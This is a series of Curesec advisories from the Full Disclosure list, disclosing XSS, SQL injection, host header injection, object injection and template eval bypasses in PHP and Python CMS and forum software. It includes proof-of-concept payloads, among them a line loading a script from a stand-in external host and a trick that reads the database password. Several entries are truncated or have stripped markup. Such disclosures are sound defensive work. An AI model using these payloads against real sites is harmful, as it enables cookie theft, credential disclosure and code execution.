Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Mezzanine 4.2.0: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Mezzanine 4.2.0 Fixed in:4.2.1 Fixed Version Link: https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1 Vendor Website: http://mezzanine.jupo.org/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to public: 11/10/2016 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Mezzanine is an open source CMS written in python. In version 4.2.0, it is vulnerable to two persistent XSS attacks, one of which requires extended privileges, the other one does not. These issues allow an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. 3. Details XSS 1: Persistent XSS via Name in Comments CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: When leaving a comment on a blog post, the author name is echoed unencoded in the backend, leading to persistent XSS. Proof of Concept: Leave a comment, as author name use '"> To trigger the payload, view the comment overview in the admin backend: http:// localhost:8000/admin/generic/threadedcomment XSS 2: Persistent XSS via HTML file upload CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N Description: When uploading files via the media manager, the extension .html is allowed, leading to XSS via file upload. An account with the permissions to upload files to the media manager is required. Proof of Concept: Visit the media manager and upload a .html file: http://localhost:8000/admin/ media-library/upload/?ot=desc&o=date As uploaded files are stored inside the web root, it can now be accessed, thus executing the JavaScript code it contains: http://localhost:8000/static/media/uploads/xss.html 4. Solution To mitigate this issue please upgrade at least to version 4.2.1: https://github.com/stephenmcd/mezzanine/releases/tag/4.2.1 Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue 09/05/2016 Vendor replies 09/19/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Mezzanine-420-XSS-177.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] SPIP 3.1: XSS & Host Header Injection
Security Advisory - Curesec Research Team 1. Introduction Affected SPIP 3.1 Product: Fixed in:3.1.2 / 3.0.23 Fixed Versionhttp://www.spip.net/en_download Link: Vendor Website: http://www.spip.net/ VulnerabilityReflected & Persistent XSS, Host Header Injection, httpOnly Type:Cookie disclosure Remote Yes Exploitable: Reported to 09/05/2016 vendor: Disclosed to 11/10/2016 public: Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview SPIP is a content management system written in PHP. In version 3.1, it is vulnerable to a persistent as well as reflected cross site scripting vulnerability as it allows users to enter URLs containing the JavaScript protocol, which an attacker can exploit to steal cookies, inject JavaScript keylogger, or bypass CSRF protection. Additionally, it contains a Host Header Injection which may lead to the leakage of password reset tokens and thus the compromisation of user accounts. Finally, the application discloses httpOnly cookies, making exploitation of XSS issues slightly easier. 3. Details Persistent XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: When posting a message in the internal Forum, user input is properly encoded, thus disallowing XSS. However, a hypertext link may be added as well, and there is no check on the protocol of the supplied link, which leads to an XSS vulnerability. Proof of Concept: 1. Create a new Message: http://localhost/spip/ecrire/?exec=forum&repondre=new 2. In the URL field enter: javascript:alert(1) 3. Post the Message To trigger the payload, a click on the link is required. Reflected XSS CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description: When editing a private message, a redirect parameter may be submitted as well. This parameter decides to what page a user is returned if they were to press the back button. The value of this parameter is user controlled and may thus be used for phishing or XSS attacks. Proof of Concept: Visit: http://localhost/spip/ecrire/?exec=message_edit&new=oui&to=2&redirect= javascript:alert(1) Click on the Back button represented by the envelope icon. Host Header Injection CVSS: Low 2.6 AV:N/AC:H/Au:N/C:P/I:N/A:N Description: The application takes the Host Header and uses it in a password reset email. As the Host Header is user-controlled, an attacker can set it to arbitrary values. In the case of a password reset page, this can lead to security issues as an attacker can request a password reset email for a user and set the Host header to a server they control. As this header is used in the email, a user would be send to the attackers server if they were to click on the link, leading to the leakage of the recovery token and thus the compromisation of the account. Proof of Concept: Request: POST /spip/spip.php?page=spip_pass&lang=en HTTP/1.1 Host: example.com Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: spip_accepte_ajax=1; spip_admin=%40admin; PHPSESSID=1l8rvbhcgia45ddj7ldoc1gpf6; wb-installer=3d2hes1b6i0bfb586iucm76sp2; wb-4174-sid=u571gr7isplq8b4f01fniqevk2 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/ x-www-form-urlencoded Content-Length: 199 page=spip_pass&lang=en& formulaire_action=oubli&formulaire_action_args= orESpF0vSC3Q%2BB30uGEFqT7k6AcDObDMasMNzVp3EjndtlvZ%2B5k4g%2FkyF%2BAlzhBhCI%2F%2F9hx%2FZ33mkQPk &oubli=visitor%40example.com&nobot= Email Send: [My SPIP site] Forgotten password (this is an automated message) To recover your access to the site My SPIP site (http://localhost/spip) Please go to the following address: http:// example.com/spip/spip.php?page=spip_pass&p=107017475657c15ad6e9c781.23674073 You can then enter a new password and log in to the site. httpOnly Cookie Disclosure Description: The phpinfo page discloses httpOnly cookies such as session cookies, making it slightly easier to exploit XSS vulnerabilities. Proof of Concept: http://localhost/spip/ecrire/?exec=info 4. Solution To mitigate this issue please upgrade at least to version 3.1.2: http://www.spip.net/en_download Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue 09/23/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/SPIP-31-XSS-amp-Host-Header-Injection-178.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] MyLittleForum 2.3.6.1: XSS & RPO
Security Advisory - Curesec Research Team 1. Introduction Affected Product: MyLittleForum 2.3.6.1 Fixed in: 2.3.7beta Fixed Version Link: https://github.com/ilosuna/mylittleforum/releases/tag/ v2.3.7beta Vendor Website: http://mylittleforum.net/ Vulnerability Type: XSS & RPO Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to11/10/2016 public: Release mode: Coordinated Release CVE:n/a Credits Tim Coen of Curesec GmbH 2. Overview MyLittleForum is forum software written in PHP. In version 2.3.6.1, it is vulnerable to reflected cross site scripting as well as relative path overwrite. XSS can be used to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection, and RPO may lead to CSS injection. 3. Details Reflected XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: The username and email parameter of the add user page are vulnerable to reflected XSS. Proof of Concept: http://localhost/mylittleforum-2.3.6.1/index.php"; method="POST"> alert(1)" /> Relative Path Overwrite Description: Because the application includes CSS files relative instead of absolute, an attacker can overwrite the path. With some browsers, this may lead to CSS injection. Proof of Concept: http://localhost/mylittleforum-2.3.6.1/index.php?id=1 4. Solution To mitigate this issue please upgrade at least to version 2.3.7beta: https://github.com/ilosuna/mylittleforum/releases/tag/v2.3.7beta Please note that a newer version might already be available. 5. Report Timeline 09/05/2015 Informed Vendor about Issue (no reply) 09/15/2015 Reminded Vendor of Disclosure Date 09/15/2015 Vendor replies 10/04/2015 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/MyLittleForum-2361-XSS-amp-RPO-179.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] MyBB 1.8.6: XSS
Security Advisory - Curesec Research Team 1. Introduction Affected Product:MyBB 1.8.6 Fixed in:1.8.7 Fixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip Vendor Website: http://www.mybb.com/ Vulnerability Type: XSS Remote Exploitable: Yes Reported to vendor: 01/29/2016 Disclosed to public: 09/15/2016 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview MyBB is forum software written in PHP. In version 1.8.6, it contains various XSS vulnerabilities, some of which are reflected and some of which are persistent. Some of them depend on custom forum or server settings. These issues may lead to the injection of JavaScript keyloggers, injection of content such as ads, or the bypassing of CSRF protection, which would for example allow the creation of a new admin user. 3. Details XSS 1: Persistent XSS - Signature CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: The profile editor of the moderator control panel does not properly encode the signature of a user when editing it. Because of this, a user can create a specifically crafted signature and - once a moderator or admin visits the profile editor for that user - the injected code will be executed in the context of the victims browser. Proof of Concept: Visit the profile at: http://localhost/mybb_1806/Upload/modcp.php?action= editprofile&uid=[USER_ID] As signature, use: XSS 2: Persistent XSS - Forum Post (depending on forum settings) CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: An admin can allow HTML input for specific forums via the setting allowhtml. There are various filters in place which intend to make this safe, which may leave the admin with the impression that it is indeed safe. However, there are various possibilities to bypass these filters, mainly using HTML5 features. Proof of Concept: -> Visiting the post will trigger the code context menu -> A right-click will trigger the code Enter something: -> Input into the field will trigger the code -> A click on submit will trigger the code There are various other attributes which may also work, such as onsearch, onkeydown, onkeyup, ondrag, onscroll, oncopy, and so on. Other attributes such as onMouseOver or onFocus are filtered out. XSS 3: Persistent XSS - Username (depending on forum settings) CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description: The username is echoed unencoded in the user area. As the login does not have CSRF protection and as an admin can be logged into the admin area with a different account than the one they are logged into the forum, a persistent XSS vulnerability in the user area can be exploited. However, successful exploitation most likely requires a username length of at least 43 characters, which is more than the default settings allow. Simple Proof of Concept: 1. register user with name f" onmouseover="alert(1)" b=" 2. login and visit http://localhost/mybb_1805/Upload/usercp.php 3. hover over the avatar The simple proof of concept can be improved to allow successful exploitation. It is not required for the victim to hover over the avatar or interact with the webpage in any way: 1. As username, use: f" onerror="alert(1)" b=" 2. Set an avatar, and use a URL as source (not an image upload) 3. Delete the image from the remote host, making it unavailable, thus triggering an error and executing the injected code. Possible Payloads: Loading a script with vanilla javascript takes a lot more characters than are allowed in a username by default: "onerror="s=document.createElement('script');s.src='http://localhost/s.js'; document.getElementById('top').appendChild(s)" As jQuery is loaded, this can be optimized: "onerror="$.getScript('http://aa.bc/s.js') Executing the payload for a victim: The attack does not require the victim to not be logged in as normal user, as one can login even when already logged in. The login as a normal user also does not affect the login as admin. Thus, an attacker could use the following payload to log a victim in and redirect them to the site containing the payload: http://localhost/mybb_1805/Upload/ member.php" target="myframe" id="myform" name="myform">http://localhost/s.js')" />document.myform.submit(); It will automatically log the victim in and redirect them to the page that triggers the script execution. No action of the victim is required. The loaded script could for example perform a backup of the database and then send the attacker the name of the backup, as backups are stored in a public directory. XSS 4: Persistent XSS - Post Attachment (depending on server settings) CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N Description: Attachments are uploaded to a public directory, and their extension is changed to .attach. Files with extension .attach that contain HTML code are interpreted as HTML files by some default server configurations (for example Apache). Additionally, t
[FD] Oxwall 1.8.0: XSS & Open Redirect
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Oxwall 1.8.0 (build 9900) Fixed in:1.8.2 Fixed Version Link: https://developers.oxwall.com/download Vendor Website: http://www.oxwall.org/ Vulnerability Type: XSS & Open Redirect Remote Exploitable: Yes Reported to vendor: 11/21/2015 Disclosed to public: 09/15/2016 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Oxwall is a social networking software written in PHP. In version 1.8.0, it is vulnerable to multiple XSS attacks and a persistent open redirect. The XSS vulnerabilities are reflected as well as persistent, and can lead to the stealing of cookies, injection of keyloggers, or the bypassing of CSRF protection. 3. Details XSS 1: Reflected XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N When performing a ping request, the method value is echoed unencoded, leading to reflected XSS. Proof of Concept: http://localhost/oxwall-1.8.0/base/ping/index/"; method="POST"> ","params":{}}]}" /> Code: ow_system_plugins/base/controllers/ping.php $responseStack[] = array( 'command' => $c['command'], 'result' => $event->getData() ); } echo json_encode(array( 'stack' => $responseStack )); XSS 2: Persistent XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N The name of a photo album is vulnerable to persistent XSS in two places: When viewing a user profile, and after editing the album. Both of these are DOM based XSS vulnerabilities, and both of these require some interaction of the victim, eg hovering or clicking. Proof of Concept: 0. Register an account 1. Create a new album with the name '"> 2. Visit the users profile: http://localhost/oxwall-1.8.0/user/[username] 3. Hover over the image belonging to that album An alternative to steps 2. and 3. is: 2. use CSRF to log the victim into the account with the injected album name 3. Use ClickJacking to get user to click "Edit Album" and then click "Done" XSS 3: Self-XSS CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N The chat window is vulnerable to self-XSS. It may be possible to exploit this issue via ClickJacking in some browsers. Proof of Concept: Open a chat and paste the following into the text field (there is no need to send it, although that would trigger the vulnerability again as well): '"> Persistent Open Redirect CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N The real name of a user is echoed inside meta tags without proper encoding. Tags are stripped, which prevents an attacker from adding new tags, but it is still possible to add additional attributes to the meta tag, leading to an open redirect and potentially XSS in older browsers. Proof of Concept: 1. Register a new user. As real name use: 5;URL=http://google.com/"; http-equiv="refresh" foo=" 2. Visit the profile of that user: http://localhost/oxwall-1.8.0/user/[username] 4. Solution To mitigate this issue please upgrade at least to version 1.8.2. Please note that a newer version might already be available. 5. Report Timeline 11/21/2015 Informed Vendor about Issue (no reply) 12/10/2015 Reminded Vendor of Disclosure Date 12/15/2015 Vendor requests more time 01/13/2016 Contacted Vendor, Vendor requests more time 02/01/2016 Contacted Vendor, Vendor requests more time 02/22/2016 Vendor releases fix 09/15/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Oxwall-180-XSS-amp-Open-Redirect-148.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] MyBB 1.8.6: Improper validation of data passed to eval
Security Advisory - Curesec Research Team 1. Introduction Affected Product:MyBB 1.8.6 Fixed in:1.8.7 Fixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip Vendor Website: http://www.mybb.com/ Vulnerability Type: Improper validation of data passed to eval Remote Exploitable: Yes Reported to vendor: 01/29/2016 Disclosed to public: 09/15/2016 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview MyBB is forum software written in PHP. In version 1.8.6, it improperly validates templates that are passed to eval, allowing for the disclosure of the database password. If the database is writable from remote, it may also lead to code execution. An admin account is required. 3. Details Description CVSS: Low 3.5 AV:N/AC:M/Au:S/C:P/I:N/A:N MyBB allows an admin to edit templates. These templates can contain HTML, and it is possible to read out the content of PHP variables as well as the properties of objects. There are filters in place which should make it impossible to call functions or to read out sensitive information such as database credentials. Templates are used as following: eval('$variable = "'.$templates->get('templateName').'";'); $templates->get returns the template as saved in the database, with double quotes and slashes escaped. When saving a template, the template is passed to the check_template function to check if it contains malicious content. The checks try to prevent the reading of the database password as well as the calling of functions. This means that none of the naive attempts to read out the database password - eg $config['database']['password'], $config[database][password], or $config ["database"]["password"] - would work. However, it is still possibly to read out the database password by setting the value of an existing variable to "password" and using that variable when reading out the password, thus bypassing the filter. Proof of Concept First, edit a template such as the usercp_profile_contact_fields_field template: http://localhost/mybb_1806/Upload/admin/index.php?module=style-templates&action=edit_template&title=usercp_profile_contact_fields_field&sid=1&expand=15 Add this line at the beginning: {$cfvalue}: {$config['database'][$cfvalue]} Now, visit the profile: http://localhost/mybb_1806/Upload/usercp.php?action=profile As any of the "Additional Contact Information" values, use "password" to read out the database password, "hostname" to read out the hostname, and "username" to read out the user. In case that the database is writable from remote, an attacker could now also gain code execution, as check_template is applied when saving templates, not when loading them. Example query: UPDATE mybb_templates SET template="{${phpinfo()}}" WHERE title= "usercp_profile_contact_fields_field"; Visiting the profile will execute the injected code. Code inc/config.php $config['database']['password'] = '[THE_DATABASE_PASSWORD]'; admin/inc/functions.php function check_template($template) { // Check to see if our database password is in the template if(preg_match("#database'?\\s*\]\\s*\[\\s*'?password#", $template)) { return true; } // System calls via backtick if(preg_match('#\$\s*\{#', $template)) { return true; } // Any other malicious acts? // Courtesy of ZiNgA BuRgA if(preg_match("~\\{\\$.+?\\}~s", preg_replace('~\\{\\$+[a-zA-Z_][a-zA-Z_0-9]*((?:-\\>|\\:\\:)\\$*[a-zA-Z_][a-zA-Z_0-9]*|\\[\s*\\$*([\'"]?)[a-zA-Z_ 0-9 ]+\\2\\]\s*)*\\}~', '', $template))) { return true; } return false; } usercp.php (as one example) foreach(array('icq', 'aim', 'yahoo', 'skype', 'google') as $cfield) { $contact_fields[$cfield] = ''; $csetting = 'allow'.$cfield.'field'; if($mybb->settings[$csetting] == '') { continue; } if(!is_member($mybb->settings[$csetting])) { continue; } $cfieldsshow = true; $lang_string = 'contact_field_'.$cfield; $lang_string = $lang->{$lang_string}; $cfvalue = htmlspecialchars_uni($user[$cfield]); eval('$contact_fields[$cfield] = "'.$templates->get('usercp_profile_contact_fields_field').'";'); } 4. Solution To mitigate this issue please upgrade at least to version 1.8.7: http://resources.mybb.com/downloads/mybb_1807.zip Please note that a newer version might already be available. 5. Report Timeline 01/29/2016 Informed Vendor about Issue 02/26/2016 Vendor requests more time 03/11/2016 Vendor releases fix 09/15/2016 Di
[FD] MyBB 1.8.6: SQL Injection
Security Advisory - Curesec Research Team 1. Introduction Affected Product:MyBB 1.8.6 Fixed in:1.8.7 Fixed Version Link: http://resources.mybb.com/downloads/mybb_1807.zip Vendor Website: http://www.mybb.com/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 01/29/2016 Disclosed to public: 09/15/2016 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview MyBB is forum software written in PHP. In version 1.8.6, it is vulnerable to a second order SQL injection by an authenticated admin user, allowing the extraction of data from the database. 3. Details Description CVSS: Medium 6.0 AV:N/AC:M/Au:S/C:P/I:P/A:P The setting threadsperpage is vulnerable to second order error based SQL injection. An admin account is needed to change this setting. The injection takes place into a LIMIT clause, and the query also uses ORDER BY, making an injection of UNION ALL not possible, but it is still possibly to extract information. Proof of Concept Go to the settings page: http://localhost/mybb_1806/Upload/admin/index.php?module=config-settings&action=change&gid=7 For Setting "threadsperpage" use: 20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); Visit a forum to trigger injected code: http://localhost/mybb_1806/Upload/forumdisplay.php?fid=3 The result will be: SQL Error: 1105 - XPATH syntax error: ':5.5.33-1' Query: SELECT t.*, (t.totalratings/t.numratings) AS averagerating, t.username AS threadusername, u.username FROM mybb_threads t LEFT JOIN mybb_users u ON (u.uid = t.uid) WHERE t.fid='3' AND t.visible IN (-1,0,1) ORDER BY t.sticky DESC, t.lastpost desc LIMIT 0, 20 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1); Code forumdisplay.php $perpage = $mybb->settings['threadsperpage']; [...] $query = $db->query(" SELECT t.*, {$ratingadd}t.username AS threadusername, u.username FROM ".TABLE_PREFIX."threads t LEFT JOIN ".TABLE_PREFIX."users u ON (u.uid = t.uid) WHERE t.fid='$fid' $tuseronly $tvisibleonly $datecutsql2 $prefixsql2 ORDER BY t.sticky DESC, {$t}{$sortfield} $sortordernow $sortfield2 LIMIT $start, $perpage "); 4. Solution To mitigate this issue please upgrade at least to version 1.8.7: http://resources.mybb.com/downloads/mybb_1807.zip Please note that a newer version might already be available. 5. Report Timeline 01/29/2016 Informed Vendor about Issue 02/26/2016 Vendor requests more time 03/11/2016 Vendor releases fix 09/15/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/MyBB-186-SQL-Injection-159.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] MyBB 1.8.6: CSRF, Weak Hashing, Plaintext Passwords
Security Advisory - Curesec Research Team 1. Introduction Affected Product:MyBB 1.8.6 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://www.mybb.com/ Vulnerability Type: CSRF, Weak Hashing, Plaintext Passwords Remote Exploitable: Yes Reported to vendor: 01/29/2016 Disclosed to public: 09/15/2016 Release mode:Full Disclosure / Informational CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview MyBB 1.8.6 is vulnerable to login CSRF. Additionally, it stores passwords using weak hashing, and sends passwords via email in plaintext. 3. Login CSRF Description CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N The login of MyBB does not have any CSRF protection. The impact of this is low, but a victim could provide sensitive information under a fake account. An example would be the accidental sending of a sensitive private message while being logged into an account controlled by an attacker. Additionally, a login CSRF makes it possible to exploit possible vulnerabilities in the user area, such as XSS. Proof of Concept http://localhost/mybb_1806/Upload/member.php"; method="POST"> http://localhost/mybb_1806/Upload/index.php"; /> 4. Weak Hashing Description MyBB uses md5 for hashing passwords, which is not considered secure. The hashing used is: $hash = md5(md5($salt).md5($password)); 5. Passwords Emailed in Plaintext Description When passwords are reset, the generated 8 character password is send to the user via email in plaintext. It is suggested that users change these passwords, but a change is not required. It is recommended to use a password reset token instead, and to force the user to create a new password themselves. 6. Solution This issue was not fixed by the vendor. 7. Report Timeline 01/29/2016 Informed Vendor about Issue 02/26/2016 Vendor requests more time 03/11/2016 Vendor releases new version 03/15/2016 Requested information about unfixed issues 03/15/2016 Vendor considers issues minor and will not fix them for now 09/15/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/MyBB-186-CSRF-Weak-Hashing-Plaintext-Passwords-161.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Kajona 4.7: XSS & Directory Traversal
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Kajona 4.7 Fixed in:5.0 Fixed Version Link: https://www.kajona.de/en/Downloads/ downloads.get_kajona.html Vendor Website: https://www.kajona.de/ Vulnerability Type: XSS & Directory Traversal Remote Exploitable: Yes Reported to vendor: 04/11/2016 Disclosed to public: 09/15/2016 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Kajona is an open source CMS written in PHP. In version 4.7, it is vulnerable to multiple XSS attacks and limited directory traversal. The XSS vulnerabilities are reflected as well as persistent, and can lead to the stealing of cookies, injection of keyloggers, or the bypassing of CSRF protection. The directory traversal issue gives information about which files exist on a system, and thus allows an attacker to gather information about a system. 3. Details XSS 1: Reflected XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N The function that parses admin requests echoes user input into a JavaScript context without escaping, leading to reflected XSS. As the injection takes place into a JavaScript context, browser filters will generally not be able to filter out an attack. In the case of Kajona, XSS may lead to code execution, as admins can upload PHP files via the media manager. Proof of Concept: http://localhost/kajona/index.php?admin=1&module=search&action=search&peClose=1&peRefreshPage=';alert(1);foo=' Code: core/module_system/system/class_request_dispatcher.php $strReturn = ""; XSS 2: Reflected XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N The media manager echoes the form_element parameter into a JavaScript context without escaping, leading to reflected XSS. As the injection takes place into a JavaScript context, browser filters will generally not be able to filter out an attack. Note that a valid systemid id is required. Proof of Concept: http://localhost/kajona/index.php?admin=1&module=mediamanager&action=folderContentFolderviewMode&systemid=[VALID_SYSTEM_ID]&form_element=']]);alert(1);KAJONA.admin.folderview.selectCallback([['# Click on "Accept" overlay of an image to trigger the injected code. XSS 3: Reflected XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N The "class_messageprovider_exceptions_enabled" parameter of the xml.php script is vulnerable to reflected XSS. Proof of Concept: http://localhost/kajona/xml.php?admin=1&module=messaging&action=saveConfigAjax&systemid=&class_messageprovider_exceptions_enabled=false<%2fa>&messageprovidertype=class_messageprovider_exceptions XSS 4: Persistent XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N When creating a comment, the subject is vulnerable to persistent XSS. The click of an admin is required to execute the injected JavaScript code. Proof of Concept: 1. Leave a comment: http://localhost/kajona/index.php?page=postacomment 2. As subject, use: ');alert('1 3. Visit the comment overview: http://localhost/kajona/index.php?admin=1&module=postacomment&action=list 4. Click edit on the comment 5. Click on "Edit Tags" (the second symbol from the right) Directory Traversal When viewing images, the file name is improperly sanitized, allowing for directory traversal. It is not possible to actually read out files, as there are additional checks in place preventing that. But an unauthenticated attacker can still see which files exist on a system and which do not, making it possible to collect information for further attacks. Proof of Concept: GET /kajona/image.php?image=/files/images/upload///////download.php&maxWidth=20&maxHeight=2 HTTP/1.1 -> 200 (but not shown) GET /kajona/image.php?image=/files/images/upload///////foobar.php&maxWidth=20&maxHeight=2 HTTP/1.1 -> 404 Code: core/module_system/image.php public function __construct() { //find the params to use $this->strFilename = urldecode(getGet("image")); //avoid directory traversing $this->strFilename = str_replace("../", "", $this->strFilename); [...] } [...] private function resizeImage() { //Load the image-dimensions if(is_file(_realpath_ . $this->strFilename) && (uniStrpos($this->strFilename, "/files") !== false || uniStrpos($this->strFilename, "/templates") !== false)) { [...] } class_response_object::getInstance()->setStrStatusCode(class_http_statuscodes::SC_NOT_FOUND); class_response_object::getInstance()->sendHeaders(); } 4. Solution To mitigate this issue please upgrade at least to version 5.0: https://www.kajona.de/en/Downloads/downloads.get_kajona.html Please note that a newer version might already be available. 5. Report Timeline 04/11/2016 Informed Vendor about Issue 04/13/2016 Vendor applies fix to github 05/25/2016 Vendor releases fixed version 09/15/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Kajona-47-XSS-amp-Directory-T
[FD] Peel Shopping 8.0.2: Object Injection
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Peel Shopping 8.0.2 Fixed in:8.0.3 Fixed Version Link: www.peel-shopping.com Vendor Website: www.peel-shopping.com Vulnerability Type: Object Injection Remote Exploitable: Yes Reported to vendor: 04/11/2016 Disclosed to public: 09/15/2016 Release mode:Coordinated Release CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Peel Shopping is ecommerce software written in PHP. In version 8.0.2, it is vulnerable to Object Injection. Peel Shopping stores a PHP object in a cookie, which is then unserialized when received by the application. An attacker can send arbitrary PHP objects, and has thus a limited influence on the control flow of the application. This can for example lead to DOS attacks by creating an infinite loop. 3. Details The last_views cookie is passed to unserialize, leading to Object Injection. Authentication is not required. The impact of the vulnerability is difficult to estimate, as it may increase with the existence of further modules. Without any modules installed, it can at a minimum lead to DOS. Proof of Concept: GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1 Host: localhost Cookie: last_views=[INJECTED_OBJECT]; DOS Example: The Smarty_Internal_Configfileparser class can be used to create an infinite loop. GET /peel-shopping_8_0_2/achat/produit_details.php?id=1 HTTP/1.1 Host: localhost Accept-Encoding: gzip, deflate Cookie: last_views= %4f%3a%33%32%3a%22%53%6d%61%72%74%79%5f%49%6e%74%65%72%6e%61%6c%5f%43%6f%6e%66%69%67%66%69%6c%65%70%61%72%73%65%72%22%3a%33%3a%7b%73%3a%37%3a%22%79%79%73%74%61%63%6b%22%3b%4e%3b%73%3a%35%3a%22%79%79%69%64%78%22%3b%69%3a%31%3b%73%3a%31%31%3a%22%79%79%54%6f%6b%65%6e%4e%61%6d%65%22%3b%61%3a%30%3a%7b%7d%7d; Connection: close (Payload URL decoded: O:32:"Smarty_Internal_Configfileparser":3:{s:7:"yystack";N;s:5:"yyidx";i:1; s:11:"yyTokenName";a:0:{}}) 4. Solution To mitigate this issue please upgrade at least to version 8.0.3 Please note that a newer version might already be available. 5. Report Timeline 04/11/2016 Informed Vendor about Issue 04/12/2016 Vendor announces release of fix before 05/11/2016 09/14/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Peel-Shopping-802-Object-Injection-164.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] PivotX 2.3.11: Reflected XSS
